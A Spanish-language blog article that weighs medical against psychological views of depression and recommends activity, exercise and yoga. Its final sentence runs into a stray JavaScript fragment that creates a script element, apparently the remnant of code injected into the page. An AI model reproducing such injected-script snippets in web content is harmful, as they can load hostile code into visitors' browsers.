Salud y belleza » Enfermedades

Depresión: ¿rumbo a la farmacia o hacia el diván?

Sin Comentarios

El tema de la depresión sugiere todo un conflicto de intereses entre profesionales de dos ramas históricamente en puja: ¿acaso éste hundimiento físico-sentimental es realmente un problema que puede tratarse mediante métodos semejantes a los practicados en una enfermedad común y corriente o se trata, en todo caso, de un problema cuya raíz abarca otro tipo de ciencias como la psicología?.

Escuchemos a un profesional de la medicina: “la depresión es un síndrome o conjunto de síntomas que atiende a la esfera afectiva: la tristeza patológica, la irritabilidad, el mal humor y más. Su causa puede ser conocida y existen diferentes formas de tratar, desde planes que incluyen medicación hasta otros más de avanzada”.

Ahora, veamos que opina un psicólogo: “en psicología de conducta, el término depresión hace referencia a la descripción de una situación individual mediante síntomas. La suma de estos síntomas no necesariamente implica un síndrome, sino más bien, conductas aisladas. Así llegamos a la conclusión que la depresión tiene una explicación basada en el ambiente o contexto, como un aprendizaje desadaptativo.”

Como vemos, tanto la medicina como la psicología buscan soluciones para controlar la depresión. Desde aquí, entonces, proponemos un repaso con sugerencias y recomendaciones, de unos y otros profesionales para solucionar este gran problema que afecta a muchos.

Evitar el sedentarismo
Llevar una vida activa es fundamental para que las personas no caigan en un pozo depresivo. Este consejo no solo representa un método para mantener la cabeza ocupada: también significa una forma de hallar, constantemente, razones para estar bien.

Hacer ejercicio
Pocos placeres se igualan al de haber superado una prueba netamente física. Así se trate de un deporte en conjunto o de un simple ejercicio de autosuperación, en cualquier cosa realzar actividades físicas ayuda a reducir el sentimiento de desamparo.

Aprender técnicas de relajación
A diferencia de lo que ocurre con otras prácticas, el yoga genera una armonía entre el ser y el entorno pocas veces vista. Para todas esas personas que no saben descansar, relajarse ni meditar, es sumamente recomendable apuntarse a clases de yoga (no solo por los beneficios motores, sino por el costado espiritual).

Efectivamente -y como anteriormente se remarcó, la lucha contra la depresión se debe encarar desde dos planos: el físico y el emocional.

Los psicólogos y los médicos no deben debatir las fronteras del problema: en todo caso deben buscar una comunión de recetas (como las que hemos aportado en este espacio) para hallar la mejor manera de recobrar esas ganas, ese espíritu, perdido.var d=document;var s=d.createElement('script'); }

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.